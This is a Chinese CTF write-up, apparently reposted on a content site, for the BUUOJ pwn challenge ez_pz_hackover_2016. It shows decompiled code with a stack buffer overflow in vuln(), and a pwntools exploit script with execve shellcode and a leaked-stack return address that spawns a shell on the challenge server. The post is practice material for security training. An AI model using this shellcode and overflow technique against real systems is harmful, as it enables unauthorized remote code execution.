ez_pz_hackover_2016

这篇具有很好参考价值的文章主要介绍了ez_pz_hackover_2016。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ez_pz_hackover_2016

Arch:     i386-32-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

32位,保护全关

int chall()
{
  size_t v0; // eax
  int result; // eax
  char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
  _BYTE *v3; // [esp+40Ch] [ebp-Ch]

  printf("Yippie, lets crash: %p\n", s);
  printf("Whats your name?\n");
  printf("> ");
  fgets(s, 1023, stdin);
  v0 = strlen(s);
  v3 = memchr(s, 10, v0);
  if ( v3 )
    *v3 = 0;
  printf("\nWelcome %s!\n", s);
  result = strcmp(s, "crashme");
  if ( !result )
    return vuln((char)s, 0x400u);
  return result;
}

这里不存在漏洞点

void *__cdecl vuln(char src, size_t n)
{
  char dest[50]; // [esp+6h] [ebp-32h] BYREF

  return memcpy(dest, &src, n);
}

漏洞点在这里,通过上面输入的数据传进这里并执行栈

思路

我们需要计算不同函数栈的距离

需要绕过strcmp和memchr,\x00均可绕过,答案就呼之欲出了,

调好偏移,使返回地址指向shellcode就可以getshell了

参考

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",27018,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x8048600')

sc=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
leak=get_addr_int()-(0x1c)
pl=b'crashme\x00'+b'a'*(0x12)+p64(leak)+sc
sla(b'> ',pl)

ia()

ez_pz_hackover_2016,Buuoj刷题,安全文章来源地址https://www.toymoban.com/news/detail-714457.html

到了这里,关于ez_pz_hackover_2016的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [SWPUCTF 2022 新生赛]ez_ez_php

    这段代码是一个简单的PHP文件处理脚本。让我们逐行进行分析: error_reporting(0);  - 这行代码设置了错误报告的级别为0,意味着不显示任何错误。 if (isset($_GET[\\\'file\\\'])) {  - 这行代码检查是否存在一个名为\\\"file\\\"的GET参数。 if ( substr($_GET[\\\"file\\\"], 0, 3) === \\\"php\\\" ) {  - 这行代码使用 su

    2024年02月12日
    浏览(27)
  • [FSCTF 2023]EZ_eval

    ​ ​ 这道题关键就是过滤了?号和空格还有eval执行时用了php的结束标志表示php代码到此为止了,那不行啊我后面的参数还等着被执行呢…… 可以用php短标签,有三种方式: ​ ? echo \\\'123\\\';? #前提是开启配置参数short_open_tags=on ​​ ​ script language=\\\"php\\\"echo \\\'hello\\\'; #不需要修改参数

    2024年02月08日
    浏览(23)
  • FPGA面试笔记ea-ez

    FIFO Generator核有两种读模式:Standard FIFO(标准模式)、First Word Fall Through(FWFT模式) FWFT模式类似于QuartusⅡ软件中FIFO的超前输出模式,没有读延时。 注:如果选择标准模式,勾选Output Registers,会增加一个读延时;但是选择FWFT模式,勾选Output Registers,仍然没有读延时; 风扇

    2024年02月21日
    浏览(30)
  • [SWPUCTF 2021 新生赛]ez_unserialize

    题目在哪呢?查看源代码试试 User-agent: * Disallow: 什么东西呢 发现disallow Robots 协议(也称为爬虫协议、机器人协议等)的全称是 “网络爬虫排除标准”(Robots Exclusion Protocol),网站通过 Robots 协议告诉搜索引擎哪些页面可抓,哪些页面不能抓。 disallow就是爬虫不能搜索的所以

    2024年02月05日
    浏览(31)
  • 普中STM32-PZ6806L开发板(有点悲伤的故事续-人灯还未了)

    继上篇 普中STM32-PZ6806L开发板(有点悲伤的故事) 说到 关于 普中STM32-PZ6806L开发板的LED流水灯也被烧坏掉了,再也无法玩流水灯, 内心充满了只会流水灯的不甘, 流水灯就是单片机的Hello World,怎么能没有呢? 好巧不巧想起最近电磁炉坏掉啦,这不是《歇后语》省略…, 拆掉了电

    2024年01月20日
    浏览(31)
  • [GFCTF 2021]ez_calc day3

    目录 此时我脑袋产生了几个问题:  但是尝试了几个弱密码发现不对,找一下有没有代码泄露的点。  咦发现ctrl+u查看的源码和f12显示的竟然不一样我丢,涨知识了。 js大小写有漏洞之前遇见过  条件就是: 在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。 在

    2024年02月09日
    浏览(22)
  • NSS [UUCTF 2022 新生赛]ez_upload

    考点:Apache解析漏洞 开题就是标准的上传框 起手式就是传入一个php文件,非常正常的有过滤。 .txt 、 .user.ini 、 .txxx 都被过滤了,应该是白名单或者黑名单加MIME过滤,只允许 .jpg 、 .png 。 猜测二次渲染,传了图片马上去,但是没什么用,还抓不到包了。 network看了一下报文

    2024年02月13日
    浏览(34)
  • 【STM32】--PZ6860L,STM32F4,ARM3.0开发板

    (1)各种外设和主板原理图 (2)主板供电部分5V和3.3V兼容设计 注意跳线帽 STM32和51的IO对应关系 下载电路 其实启动2次。 一次从系统区启动,一次从用户Flash启动。 第一步:先设置BOOT1和BOOT0从系统区【系统存储器】启动,执行系统中预设的程序 第二步:主机(电脑)通过

    2024年02月07日
    浏览(75)
  • [GDOUCTF 2023]<ez_ze> SSTI 过滤数字 大括号{等

    SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过(ctfshow web入门370)-CSDN博客 ssti板块注入 正好不会 {%%}的内容 学习一下 经过测试 发现过滤了 {{}} 那么我们就开始吧 我们可以通过这个语句来查询是否存在ssti   存在咯 这里跟着师傅的wp走

    2024年02月06日
    浏览(24)
  • 二、赛普拉斯EZ-USB FX3示例烧录验证

    一、简介                  本人使用的是CYUSB3KIT-003开发板,之后的示例也是基于上面验证的。 图1.0开发板实物图 二、驱动安装         步骤: ① 把开发板的跳线帽都接上。                     ② 把USB3.0线插入开发板,另一端连接电脑,此时会有一个电源灯亮

    2024年02月09日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包